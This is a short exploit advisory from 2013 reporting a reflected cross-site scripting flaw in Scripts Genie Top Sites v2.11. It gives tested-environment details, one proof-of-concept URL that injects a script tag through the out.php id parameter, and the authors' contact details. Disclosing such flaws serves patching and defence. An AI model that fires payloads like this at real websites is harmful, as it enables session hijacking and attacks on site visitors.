# Exploit Title: Scripts Genie Top Sites v2.11 <= Remote XSS Vulnerability
# Date: 26/02/2013
# Author: The Black Devils
# Software Link: http://scriptsgenie.com/index.php?do=catalog&c=scripts&i=top_site_script
# Demo : http://scriptsgenie.com/demo/toplist.2.11/toplist/index.php
# Category : [ webapps ]
# Dork : [ n / a ]
# Type : php
# Tested on: [Windows]
Tested on: Microsoft Windows Sp2
Apache 2.4.2 (Win32)
PHP 5.4.4
MySQL 5.5.25a
This vulnerability was discovered and researched by The Black Devils
[~] XSS Injection on Demo Site (/out.php?id=)
>>> http://server/out.php?id='"><script>alert(1337);</script>'
-----------
Contact:
# Youtube : www.youtube.com/user/Th3BlackDevils
# Facebook : www.facebook.com/DevilsDz
# Email : mr.k4rizma@gmail.com
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information